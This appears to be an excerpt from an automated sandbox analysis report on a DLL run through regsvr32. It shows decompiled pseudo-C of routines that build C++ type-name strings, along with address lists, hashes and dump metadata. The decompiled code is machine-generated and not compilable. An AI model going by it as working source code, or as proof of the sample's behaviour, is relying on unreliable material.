                                                                      				_t182 = _t125;
                                                                      				if (_t182 == 0) goto 0x800343b1;
                                                                      				r8d = 8;
                                                                      				E0000000118003668C(_t149, " volatile", _t209,  &_v56, "volatile", _t269, _t271);
                                                                      				r9d = 1;
                                                                      				_t280 =  &_v24;
                                                                      				E00000001180034730(_t209, _t269,  &_v56, _t269, _t271, _t280);
                                                                      				goto 0x80034530;
                                                                      				r8d = 4;
                                                                      				goto 0x80034449;
                                                                      				r8d = 8;
                                                                      				goto 0x80034449;
                                                                      				if (_t182 == 0) goto 0x8003443c;
                                                                      				if (_t182 == 0) goto 0x8003442d;
                                                                      				if (_t182 == 0) goto 0x8003441e;
                                                                      				if (_t182 == 0) goto 0x80034412;
                                                                      				if (_t149 - 0x50 == 1) goto 0x80034412;
                                                                      				r8d = 7;
                                                                      				goto 0x80034449;
                                                                      				 *0x800738a8 = _t280;
                                                                      				goto 0x8003411e;
                                                                      				r8d = 7;
                                                                      				goto 0x80034449;
                                                                      				r8d = 8;
                                                                      				goto 0x80034449;
                                                                      				r8d = 0xe;
                                                                      				E0000000118003668C(_t149 - 0x50, " volatile", _t209,  &_v56, "decltype(auto)", _t269, _t271);
                                                                      				if (r14b == 0x43) goto 0x80034486;
                                                                      				_t63 = _t286 - 0x45; // -69
                                                                      				if ((_t63 & 0x000000f9) == 0) goto 0x80034476;
                                                                      				if (r14b != 0x5f) goto 0x800344cc;
                                                                      				r15b = r15b - 0x45;
                                                                      				if (r15b - 8 > 0) goto 0x800344cc;
                                                                      				if ((r15b & 0x00000001) != 0) goto 0x800344cc;
                                                                      				_v16 = 9;
                                                                      				goto 0x80034494;
                                                                      				_v16 = 7;
                                                                      				_v24 = "signed ";
                                                                      				asm("movaps xmm0, [ebp-0x10]");
                                                                      				asm("movdqa [ebp-0x10], xmm0");
                                                                      				E0000000118002E4E4( &_v40,  &_v24);
                                                                      				E0000000118002E98C("signed ",  &_v24,  &_v56);
                                                                      				_v56 = _v24;
                                                                      				_v48 = _v16;
                                                                      				if ( *_t209 == 0) goto 0x80034503;
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v16 = _v16 & 0x00000000;
                                                                      				E0000000118002EE78(0x20, _v24, _t209,  &_v24);
                                                                      				E0000000118002E98C( &_v24,  &_v40, _t209);
                                                                      				E0000000118002EC28(_t149 - 0x50,  &_v56,  &_v40, _t209);
                                                                      				 *_t269 = _v56;
                                                                      				 *(_t269 + 8) = _v48;
                                                                      				goto 0x80034530;
                                                                      				_v16 = _v16 & 0x00000000;
                                                                      				_v24 = 0x8005fee0;
                                                                      				return E0000000118002E98C( &_v24, _t269, _t209);
                                                                      			}














































                                                                      0x180033fa0
                                                                      0x180033fa0
                                                                      0x180033fa3
                                                                      0x180033fa7
                                                                      0x180033fab
                                                                      0x180033faf
                                                                      0x180033fbb
                                                                      0x180033fc2
                                                                      0x180033fc5
                                                                      0x180033fc8
                                                                      0x180033fcf
                                                                      0x180033fd5
                                                                      0x180033fda
                                                                      0x180033fda
                                                                      0x180033fde
                                                                      0x180033fe2
                                                                      0x180033fe5
                                                                      0x180033fec
                                                                      0x180033fef
                                                                      0x180033ff3
                                                                      0x180033ff9
                                                                      0x180033fff
                                                                      0x180034002
                                                                      0x180034004
                                                                      0x180034009
                                                                      0x18003400e
                                                                      0x180034013
                                                                      0x180034018
                                                                      0x18003401d
                                                                      0x180034022
                                                                      0x180034024
                                                                      0x180034027
                                                                      0x180034029
                                                                      0x18003402c
                                                                      0x180034032
                                                                      0x18003403f
                                                                      0x180034044
                                                                      0x180034051
                                                                      0x180034056
                                                                      0x180034063
                                                                      0x180034068
                                                                      0x180034075
                                                                      0x18003407f
                                                                      0x180034084
                                                                      0x180034089
                                                                      0x18003408e
                                                                      0x180034093
                                                                      0x180034098
                                                                      0x18003409d
                                                                      0x18003409f
                                                                      0x1800340a2
                                                                      0x1800340a7
                                                                      0x1800340b8
                                                                      0x1800340bd
                                                                      0x1800340cb
                                                                      0x1800340d3
                                                                      0x1800340db
                                                                      0x1800340e0
                                                                      0x1800340e5
                                                                      0x1800340ea
                                                                      0x1800340f7
                                                                      0x1800340fc
                                                                      0x180034109
                                                                      0x180034111
                                                                      0x180034113
                                                                      0x180034113
                                                                      0x180034117
                                                                      0x180034122
                                                                      0x180034127
                                                                      0x18003412a
                                                                      0x18003412d
                                                                      0x180034131
                                                                      0x180034137
                                                                      0x18003413d
                                                                      0x180034140
                                                                      0x180034143
                                                                      0x180034148
                                                                      0x18003414c
                                                                      0x180034150
                                                                      0x180034157
                                                                      0x18003415a
                                                                      0x18003415e
                                                                      0x180034164
                                                                      0x18003416a
                                                                      0x18003416d
                                                                      0x180034173
                                                                      0x180034175
                                                                      0x180034178
                                                                      0x18003417d
                                                                      0x180034182
                                                                      0x180034184
                                                                      0x180034187
                                                                      0x180034189
                                                                      0x18003418c
                                                                      0x180034192
                                                                      0x18003419f
                                                                      0x1800341a4
                                                                      0x1800341b1
                                                                      0x1800341b6
                                                                      0x1800341bd
                                                                      0x1800341c4
                                                                      0x1800341cc
                                                                      0x1800341d0
                                                                      0x1800341d5
                                                                      0x1800341de
                                                                      0x1800341e5
                                                                      0x1800341ea
                                                                      0x1800341ed
                                                                      0x1800341f9
                                                                      0x180034200
                                                                      0x180034204
                                                                      0x18003420b
                                                                      0x180034213
                                                                      0x180034218
                                                                      0x18003421d
                                                                      0x18003421f
                                                                      0x180034222
                                                                      0x180034227
                                                                      0x18003422d
                                                                      0x18003423a
                                                                      0x18003423f
                                                                      0x18003424c
                                                                      0x180034251
                                                                      0x18003425e
                                                                      0x180034263
                                                                      0x180034266
                                                                      0x18003426c
                                                                      0x180034275
                                                                      0x18003427e
                                                                      0x180034283
                                                                      0x180034288
                                                                      0x18003428d
                                                                      0x180034293
                                                                      0x180034293
                                                                      0x18003429e
                                                                      0x1800342a3
                                                                      0x1800342b0
                                                                      0x1800342b5
                                                                      0x1800342c2
                                                                      0x1800342cc
                                                                      0x1800342d1
                                                                      0x1800342d8
                                                                      0x1800342db
                                                                      0x1800342df
                                                                      0x1800342e5
                                                                      0x1800342f6
                                                                      0x1800342f9
                                                                      0x180034300
                                                                      0x18003430a
                                                                      0x18003430c
                                                                      0x18003431a
                                                                      0x18003431e
                                                                      0x180034322
                                                                      0x18003432a
                                                                      0x18003432f
                                                                      0x180034334
                                                                      0x18003433b
                                                                      0x18003433e
                                                                      0x180034341
                                                                      0x180034349
                                                                      0x18003434d
                                                                      0x180034353
                                                                      0x180034355
                                                                      0x180034355
                                                                      0x180034364
                                                                      0x18003436b
                                                                      0x18003436d
                                                                      0x18003437b
                                                                      0x180034383
                                                                      0x18003438b
                                                                      0x180034390
                                                                      0x180034395
                                                                      0x180034397
                                                                      0x180034399
                                                                      0x18003439b
                                                                      0x1800343ac
                                                                      0x1800343b1
                                                                      0x1800343b7
                                                                      0x1800343c2
                                                                      0x1800343c7
                                                                      0x1800343cc
                                                                      0x1800343d9
                                                                      0x1800343db
                                                                      0x1800343e8
                                                                      0x1800343ed
                                                                      0x1800343f2
                                                                      0x1800343f7
                                                                      0x1800343fc
                                                                      0x180034401
                                                                      0x180034403
                                                                      0x180034410
                                                                      0x180034412
                                                                      0x180034419
                                                                      0x18003441e
                                                                      0x18003442b
                                                                      0x18003442d
                                                                      0x18003443a
                                                                      0x18003443c
                                                                      0x18003444d
                                                                      0x180034456
                                                                      0x180034458
                                                                      0x18003445e
                                                                      0x180034464
                                                                      0x180034466
                                                                      0x18003446e
                                                                      0x180034474
                                                                      0x18003447d
                                                                      0x180034484
                                                                      0x18003448d
                                                                      0x180034494
                                                                      0x18003449c
                                                                      0x1800344a4
                                                                      0x1800344a9
                                                                      0x1800344b9
                                                                      0x1800344c2
                                                                      0x1800344c9
                                                                      0x1800344d0
                                                                      0x1800344d2
                                                                      0x1800344db
                                                                      0x1800344e1
                                                                      0x1800344f1
                                                                      0x1800344fe
                                                                      0x180034507
                                                                      0x18003450d
                                                                      0x180034510
                                                                      0x180034512
                                                                      0x18003451d
                                                                      0x18003454c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                      • API String ID: 2943138195-1388207849
                                                                      • Opcode ID: d4caa6327e37e13707f04c4abd61ce10f22517b147ddcc8fe56a1d5aa5fa8963
                                                                      • Instruction ID: cf79eaeba2610f4254825801e88b5112530becaf65fab37064779d348e41b922
                                                                      • Opcode Fuzzy Hash: d4caa6327e37e13707f04c4abd61ce10f22517b147ddcc8fe56a1d5aa5fa8963
                                                                      • Instruction Fuzzy Hash: 69F17D73A10B1898FB978B65D8943EE27A1B3093C4F52C516EA0A1FAA8DF35D74CC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0000000118002FF80(void* __ebx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r12) {
                                                                      				void* __r14;
                                                                      				intOrPtr _t148;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t169;
                                                                      				void* _t183;
                                                                      				signed char* _t184;
                                                                      				char* _t187;
                                                                      				intOrPtr _t188;
                                                                      				intOrPtr* _t189;
                                                                      				intOrPtr* _t191;
                                                                      				char* _t192;
                                                                      				intOrPtr* _t195;
                                                                      				char* _t196;
                                                                      				long long _t200;
                                                                      				intOrPtr* _t232;
                                                                      				char* _t243;
                                                                      				void* _t244;
                                                                      				void* _t248;
                                                                      				void* _t250;
                                                                      				void* _t258;
                                                                      				long long* _t264;
                                                                      				void* _t269;
                                                                      				void* _t271;
                                                                      				void* _t272;
                                                                      				void* _t286;
                                                                      				void* _t287;
                                                                      				void* _t290;
                                                                      				long long _t291;
                                                                      				long long _t293;
                                                                      
                                                                      				_t289 = __r12;
                                                                      				_t266 = __rsi;
                                                                      				_t199 = __rbx;
                                                                      				_t149 = __ebx;
                                                                      				_t183 = _t271;
                                                                      				 *((long long*)(_t183 + 8)) = __rbx;
                                                                      				 *((long long*)(_t183 + 0x10)) = __rsi;
                                                                      				 *((long long*)(_t183 + 0x18)) = __rdi;
                                                                      				_t269 = _t183 - 0x158;
                                                                      				_t272 = _t271 - 0x240;
                                                                      				r14d = 0;
                                                                      				_t291 = "::";
                                                                      				 *__rcx = _t293;
                                                                      				sil = r14b;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                                      				_t264 = __rcx;
                                                                      				_t184 =  *0x800738a8; // 0x0
                                                                      				if (( *_t184 & 0x000000bf) == 0) goto 0x8003038e;
                                                                      				_t165 =  *0x800738bc - r14b; // 0x0
                                                                      				if (_t165 == 0) goto 0x8002ffdf;
                                                                      				_t166 =  *0x800738bd - r14b; // 0x0
                                                                      				if (_t166 == 0) goto 0x80030413;
                                                                      				if ( *((intOrPtr*)(__rcx)) == _t293) goto 0x8003005f;
                                                                      				 *((long long*)(_t269 - 0x60)) = _t291;
                                                                      				 *((intOrPtr*)(_t269 - 0x58)) = 2;
                                                                      				asm("movaps xmm0, [ebp-0x60]");
                                                                      				asm("movdqa [esp+0x40], xmm0");
                                                                      				E0000000118002E4E4(_t269 + 0x30, _t272 + 0x40);
                                                                      				E0000000118002E98C(_t184, _t269 - 0x50, __rcx);
                                                                      				 *_t264 =  *((intOrPtr*)(_t269 - 0x50));
                                                                      				 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t269 - 0x48));
                                                                      				if (sil == 0) goto 0x8003005f;
                                                                      				 *((long long*)(_t272 + 0x50)) = _t293;
                                                                      				 *((intOrPtr*)(_t272 + 0x58)) = r14d;
                                                                      				E0000000118002EE78(0x5b,  *((intOrPtr*)(_t269 - 0x50)), __rbx, _t272 + 0x50);
                                                                      				E0000000118002E98C(_t272 + 0x50, _t269 - 0x40, _t264);
                                                                      				sil = r14b;
                                                                      				 *_t264 =  *((intOrPtr*)(_t269 - 0x40));
                                                                      				 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t269 - 0x38));
                                                                      				_t187 =  *0x800738a8; // 0x0
                                                                      				_t169 =  *_t187 - 0x3f;
                                                                      				if (_t169 != 0) goto 0x8003035b;
                                                                      				_t24 = _t187 + 1; // 0x1
                                                                      				_t243 = _t24;
                                                                      				 *0x800738a8 = _t243;
                                                                      				if (_t169 == 0) goto 0x80030336;
                                                                      				if (_t169 == 0) goto 0x800302c0;
                                                                      				if (_t169 == 0) goto 0x8003020d;
                                                                      				if (_t169 == 0) goto 0x800302c0;
                                                                      				if (_t169 == 0) goto 0x800301c8;
                                                                      				if ( *_t243 - 0xffffffffffffffff == 8) goto 0x800300c4;
                                                                      				E000000011800357E4( *_t243 - 0xffffffffffffffff,  *_t243 - 0xffffffffffffffff - 8, _t187, _t199, _t269 + 0x40, _t243, __rsi, _t264, _t286, _t287, _t293);
                                                                      				_t244 = _t269 + 0x130;
                                                                      				goto 0x8003036d;
                                                                      				_t200 = _t293;
                                                                      				 *((intOrPtr*)(_t272 + 0x28)) = r14d;
                                                                      				_t28 = _t244 + 1; // 0x2
                                                                      				_t188 = _t28;
                                                                      				 *((long long*)(_t272 + 0x20)) = _t200;
                                                                      				 *0x800738a8 = _t188;
                                                                      				r8d = 0;
                                                                      				E0000000118002F2A4(__ebx, 1, _t200, _t272 + 0x60, _t264, __rsi);
                                                                      				if ( *((intOrPtr*)(_t272 + 0x68)) != 0) goto 0x80030147;
                                                                      				if (_t200 == 0) goto 0x80030140;
                                                                      				 *((long long*)(_t269 - 0x30)) = _t291;
                                                                      				 *((intOrPtr*)(_t269 - 0x28)) = 2;
                                                                      				asm("movaps xmm0, [ebp-0x30]");
                                                                      				asm("movdqa [esp+0x40], xmm0");
                                                                      				E0000000118002E960(_t272 + 0x60, _t269 + 0x120, _t272 + 0x40);
                                                                      				E0000000118002E98C(_t188, _t269 + 0x50, _t272 + 0x20);
                                                                      				 *((intOrPtr*)(_t272 + 0x28)) =  *((intOrPtr*)(_t188 + 8));
                                                                      				goto 0x80030152;
                                                                      				goto 0x8003013a;
                                                                      				 *((intOrPtr*)(_t272 + 0x28)) = 2;
                                                                      				 *((long long*)(_t272 + 0x20)) = _t293;
                                                                      				if ( *((intOrPtr*)(_t272 + 0x28)) != r14b) goto 0x800301b8;
                                                                      				_t189 =  *0x800738a8; // 0x0
                                                                      				if ( *_t189 != 0x40) goto 0x800300dc;
                                                                      				 *((long long*)(_t272 + 0x70)) = _t293;
                                                                      				 *((intOrPtr*)(_t272 + 0x78)) = r14d;
                                                                      				E0000000118002EE78(0x5b, _t189, _t293, _t272 + 0x70);
                                                                      				E0000000118002E98C(_t272 + 0x70, _t269 - 0x10, _t272 + 0x20);
                                                                      				r8b = 0x5d;
                                                                      				_t248 = _t269 + 0x60;
                                                                      				E0000000118002E9B8(_t269 - 0x10, _t248);
                                                                      				 *_t264 =  *_t189;
                                                                      				 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t189 + 8));
                                                                      				goto 0x80030263;
                                                                      				 *((intOrPtr*)(_t264 + 8)) = r14d;
                                                                      				 *((char*)(_t264 + 8)) = 2;
                                                                      				 *_t264 = _t293;
                                                                      				goto 0x80030384;
                                                                      				_t57 = _t248 + 1; // 0x2
                                                                      				r8d = 0;
                                                                      				 *0x800738a8 = _t57;
                                                                      				E0000000118002F2A4(__ebx, 1, _t293, _t269 + 0x70, _t264, _t266);
                                                                      				r8b = 0x5d;
                                                                      				E0000000118002E9B8(_t57, _t269 + 0x80);
                                                                      				_t250 = _t269 + 0x90;
                                                                      				E0000000118002E98C(_t57, _t250, _t264);
                                                                      				sil = 1;
                                                                      				goto 0x80030378;
                                                                      				if ( *((char*)(_t250 + 1)) != 0x5f) goto 0x8003026f;
                                                                      				if ( *((char*)(_t250 + 2)) != 0x3f) goto 0x8003026f;
                                                                      				_t63 = _t250 + 1; // 0x2
                                                                      				_t191 = _t63;
                                                                      				r8d = 0;
                                                                      				 *0x800738a8 = _t191;
                                                                      				E0000000118002F58C( *_t243 - 0xffffffffffffffff, 0, _t293, _t269 + 0xa0, _t264, _t266, _t264, __r12);
                                                                      				E0000000118002E98C(_t191, _t269 + 0xb0, _t264);
                                                                      				 *_t264 =  *_t191;
                                                                      				 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t191 + 8));
                                                                      				_t192 =  *0x800738a8; // 0x0
                                                                      				if ( *_t192 != 0x40) goto 0x80030384;
                                                                      				 *0x800738a8 =  *0x800738a8 + 1;
                                                                      				goto 0x80030384;
                                                                      				E0000000118002EF74( *_t192 - 0x40, _t293, _t269 + 0xc0, _t266, _t289, _t293);
                                                                      				 *((long long*)(_t269 - 0x80)) = _t293;
                                                                      				 *((intOrPtr*)(_t269 - 0x78)) = r14d;
                                                                      				_t204 = _t192;
                                                                      				E0000000118002EE78(0x60, _t192, _t192, _t269 - 0x80);
                                                                      				E0000000118002E98C(_t269 - 0x80, _t269, _t192);
                                                                      				r8b = 0x27;
                                                                      				E0000000118002E9B8(_t269, _t269 + 0xd0);
                                                                      				goto 0x8003036d;
                                                                      				r8b = 0x40;
                                                                      				E0000000118002E510(_t192, _t192, _t269 - 0x70, 0x800738a8, _t266, _t290);
                                                                      				 *((intOrPtr*)(_t269 - 0x18)) = 0x15;
                                                                      				 *((long long*)(_t269 - 0x20)) = "`anonymous namespace\'";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [esp+0x40], xmm0");
                                                                      				E0000000118002E4E4(_t269 + 0xf0, _t272 + 0x40);
                                                                      				E0000000118002E98C("`anonymous namespace\'", _t272 + 0x30, _t264);
                                                                      				 *_t264 =  *((intOrPtr*)(_t272 + 0x30));
                                                                      				 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t272 + 0x38));
                                                                      				_t232 =  *0x80073898; // 0x0
                                                                      				if ( *_t232 == 9) goto 0x80030384;
                                                                      				_t258 = _t269 - 0x70;
                                                                      				E0000000118002EEDC( *_t243 - 0xffffffffffffffff,  *((intOrPtr*)(_t272 + 0x30)), _t192, _t232, _t258);
                                                                      				goto 0x80030384;
                                                                      				_t85 = _t258 - 1; // 0x0
                                                                      				_t195 = _t85;
                                                                      				r8d = 0;
                                                                      				 *0x800738a8 = _t195;
                                                                      				E0000000118002F2A4(_t149, 1, _t192, _t269 + 0x100, _t264, _t266);
                                                                      				goto 0x8003036d;
                                                                      				r8d = 0;
                                                                      				E0000000118002F2A4(_t149, 1, _t204, _t269 + 0x20, _t264, _t266);
                                                                      				E0000000118002E98C(_t195, _t269 + 0x10, _t264);
                                                                      				 *_t264 =  *_t195;
                                                                      				 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t195 + 8));
                                                                      				if ( *((intOrPtr*)(_t264 + 8)) == r14b) goto 0x8002ffb9;
                                                                      				_t196 =  *0x800738a8; // 0x0
                                                                      				if ( *_t196 == r14b) goto 0x800303ac;
                                                                      				if ( *_t196 == 0x40) goto 0x80030413;
                                                                      				 *((intOrPtr*)(_t264 + 8)) = r14d;
                                                                      				 *((char*)(_t264 + 8)) = 2;
                                                                      				 *_t264 = _t293;
                                                                      				goto 0x80030413;
                                                                      				if ( *_t264 != _t293) goto 0x800303c5;
                                                                      				 *((intOrPtr*)(_t264 + 8)) = r14d;
                                                                      				 *((char*)(_t264 + 8)) = 1;
                                                                      				 *_t264 = 0x8005fee0;
                                                                      				goto 0x80030413;
                                                                      				 *((long long*)(_t272 + 0x30)) = _t291;
                                                                      				 *((intOrPtr*)(_t272 + 0x38)) = 2;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [ebp-0x70], xmm0");
                                                                      				 *((intOrPtr*)(_t272 + 0x38)) = r14d;
                                                                      				 *((long long*)(_t272 + 0x30)) = 0x8005fee0;
                                                                      				E0000000118002E960(_t272 + 0x30, _t269 + 0x10, _t269 - 0x70);
                                                                      				E0000000118002E98C(0x8005fee0, _t269 + 0x20, _t264);
                                                                      				 *_t264 =  *0x8005fee0;
                                                                      				_t148 =  *0x18005FEE8;
                                                                      				 *((intOrPtr*)(_t264 + 8)) = _t148;
                                                                      				return _t148;
                                                                      			}

































                                                                      0x18002ff80
                                                                      0x18002ff80
                                                                      0x18002ff80
                                                                      0x18002ff80
                                                                      0x18002ff80
                                                                      0x18002ff83
                                                                      0x18002ff87
                                                                      0x18002ff8b
                                                                      0x18002ff94
                                                                      0x18002ff9b
                                                                      0x18002ffa2
                                                                      0x18002ffa5
                                                                      0x18002ffac
                                                                      0x18002ffaf
                                                                      0x18002ffb2
                                                                      0x18002ffb6
                                                                      0x18002ffb9
                                                                      0x18002ffc3
                                                                      0x18002ffc9
                                                                      0x18002ffd0
                                                                      0x18002ffd2
                                                                      0x18002ffd9
                                                                      0x18002ffe2
                                                                      0x18002ffe4
                                                                      0x18002ffed
                                                                      0x18002fff8
                                                                      0x18002fffc
                                                                      0x180030002
                                                                      0x180030011
                                                                      0x18003001a
                                                                      0x180030020
                                                                      0x180030026
                                                                      0x18003002a
                                                                      0x180030034
                                                                      0x180030039
                                                                      0x18003004a
                                                                      0x180030053
                                                                      0x180030056
                                                                      0x18003005c
                                                                      0x18003005f
                                                                      0x180030066
                                                                      0x180030069
                                                                      0x18003006f
                                                                      0x18003006f
                                                                      0x180030073
                                                                      0x180030080
                                                                      0x180030089
                                                                      0x180030092
                                                                      0x18003009b
                                                                      0x1800300a4
                                                                      0x1800300ad
                                                                      0x1800300b3
                                                                      0x1800300b8
                                                                      0x1800300bf
                                                                      0x1800300c4
                                                                      0x1800300c7
                                                                      0x1800300cc
                                                                      0x1800300cc
                                                                      0x1800300d0
                                                                      0x1800300d5
                                                                      0x1800300dc
                                                                      0x1800300e6
                                                                      0x1800300f1
                                                                      0x1800300f6
                                                                      0x1800300f8
                                                                      0x180030101
                                                                      0x18003010f
                                                                      0x180030118
                                                                      0x18003011e
                                                                      0x18003012f
                                                                      0x18003013a
                                                                      0x18003013e
                                                                      0x180030145
                                                                      0x180030147
                                                                      0x180030152
                                                                      0x18003015c
                                                                      0x18003015e
                                                                      0x180030168
                                                                      0x180030170
                                                                      0x18003017a
                                                                      0x18003017f
                                                                      0x180030192
                                                                      0x180030197
                                                                      0x18003019a
                                                                      0x1800301a2
                                                                      0x1800301aa
                                                                      0x1800301b0
                                                                      0x1800301b3
                                                                      0x1800301b8
                                                                      0x1800301bc
                                                                      0x1800301c0
                                                                      0x1800301c3
                                                                      0x1800301c8
                                                                      0x1800301cc
                                                                      0x1800301d1
                                                                      0x1800301dc
                                                                      0x1800301e1
                                                                      0x1800301ee
                                                                      0x1800301f6
                                                                      0x180030200
                                                                      0x180030205
                                                                      0x180030208
                                                                      0x180030211
                                                                      0x180030217
                                                                      0x180030219
                                                                      0x180030219
                                                                      0x18003021d
                                                                      0x180030222
                                                                      0x180030230
                                                                      0x180030242
                                                                      0x18003024a
                                                                      0x180030250
                                                                      0x180030253
                                                                      0x18003025d
                                                                      0x180030263
                                                                      0x18003026a
                                                                      0x180030276
                                                                      0x18003027d
                                                                      0x180030285
                                                                      0x180030289
                                                                      0x18003028c
                                                                      0x18003029c
                                                                      0x1800302a1
                                                                      0x1800302af
                                                                      0x1800302bb
                                                                      0x1800302c0
                                                                      0x1800302ce
                                                                      0x1800302da
                                                                      0x1800302e1
                                                                      0x1800302ea
                                                                      0x1800302f5
                                                                      0x1800302fb
                                                                      0x18003030b
                                                                      0x180030315
                                                                      0x18003031c
                                                                      0x18003031f
                                                                      0x180030329
                                                                      0x18003032b
                                                                      0x18003032f
                                                                      0x180030334
                                                                      0x180030336
                                                                      0x180030336
                                                                      0x18003033a
                                                                      0x18003033f
                                                                      0x18003034d
                                                                      0x180030359
                                                                      0x18003035b
                                                                      0x180030364
                                                                      0x180030373
                                                                      0x18003037b
                                                                      0x180030381
                                                                      0x180030388
                                                                      0x18003038e
                                                                      0x180030398
                                                                      0x18003039d
                                                                      0x18003039f
                                                                      0x1800303a3
                                                                      0x1800303a7
                                                                      0x1800303aa
                                                                      0x1800303b6
                                                                      0x1800303b8
                                                                      0x1800303bc
                                                                      0x1800303c0
                                                                      0x1800303c3
                                                                      0x1800303c5
                                                                      0x1800303ce
                                                                      0x1800303da
                                                                      0x1800303e4
                                                                      0x1800303e9
                                                                      0x1800303ee
                                                                      0x1800303f3
                                                                      0x180030402
                                                                      0x18003040a
                                                                      0x18003040d
                                                                      0x180030410
                                                                      0x180030432

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                      • String ID: `anonymous namespace'
                                                                      • API String ID: 3863519203-3062148218
                                                                      • Opcode ID: a8e83f2f3183f5c83ddd49c548bdff694824d857c5c8efa8f2d524ac0dad118f
                                                                      • Instruction ID: 67f4962e3eef8ddca60994335806a1f244399d003266b88d273f8624bb9072ca
                                                                      • Opcode Fuzzy Hash: a8e83f2f3183f5c83ddd49c548bdff694824d857c5c8efa8f2d524ac0dad118f
                                                                      • Instruction Fuzzy Hash: CEE14872605B889AEBA2CF64E8903ED77A4F3497C4F50C016FA8917B65DF39C658C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E00000001180034D1C(void* __ecx, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                                                                      				void* __r12;
                                                                      				void* __r14;
                                                                      				signed int _t169;
                                                                      				unsigned int _t173;
                                                                      				unsigned int _t184;
                                                                      				unsigned int _t212;
                                                                      				signed int _t223;
                                                                      				signed int _t225;
                                                                      				void* _t228;
                                                                      				signed int _t229;
                                                                      				unsigned int _t230;
                                                                      				signed int _t249;
                                                                      				void* _t258;
                                                                      				void* _t284;
                                                                      				long long _t288;
                                                                      				char* _t291;
                                                                      				long long* _t293;
                                                                      				long long _t295;
                                                                      				long long* _t300;
                                                                      				intOrPtr* _t303;
                                                                      				char* _t304;
                                                                      				char* _t305;
                                                                      				char* _t346;
                                                                      				void* _t352;
                                                                      				long long* _t369;
                                                                      				long long* _t373;
                                                                      				void* _t375;
                                                                      				void* _t376;
                                                                      				void* _t378;
                                                                      				void* _t395;
                                                                      				long long _t397;
                                                                      				void* _t399;
                                                                      				void* _t403;
                                                                      				intOrPtr* _t404;
                                                                      
                                                                      				_t371 = __rsi;
                                                                      				_t228 = __ecx;
                                                                      				_t284 = _t378;
                                                                      				 *((long long*)(_t284 + 8)) = __rbx;
                                                                      				 *((long long*)(_t284 + 0x10)) = __rsi;
                                                                      				 *((long long*)(_t284 + 0x18)) = __rdi;
                                                                      				_t376 = _t284 - 0x5f;
                                                                      				_t369 = __rcx;
                                                                      				r13d = 0;
                                                                      				_t303 =  *0x800738a8; // 0x0
                                                                      				_t404 = __rdx;
                                                                      				if ( *_t303 != r13b) goto 0x80034d77;
                                                                      				 *(_t376 - 0x11) = r13d;
                                                                      				 *((long long*)(_t376 - 0x19)) = 0x8005fee0;
                                                                      				_t304 = _t376 - 0x19;
                                                                      				E0000000118002E98C(_t304, __rcx, __rdx);
                                                                      				goto 0x8003522d;
                                                                      				if ( *_t304 - 0x36 - 3 <= 0) goto 0x80034d88;
                                                                      				if ( *_t304 != 0x5f) goto 0x80035222;
                                                                      				r8d = r8d | 0xffffffff;
                                                                      				_t305 = _t304 + 1;
                                                                      				 *0x800738a8 = _t305;
                                                                      				if ( *_t304 - 0x36 != 0x29) goto 0x80034dc6;
                                                                      				if ( *_t305 == r13b) goto 0x80034d54;
                                                                      				_t8 = _t305 + 1; // 0x2
                                                                      				_t346 = _t8;
                                                                      				 *0x800738a8 = _t346;
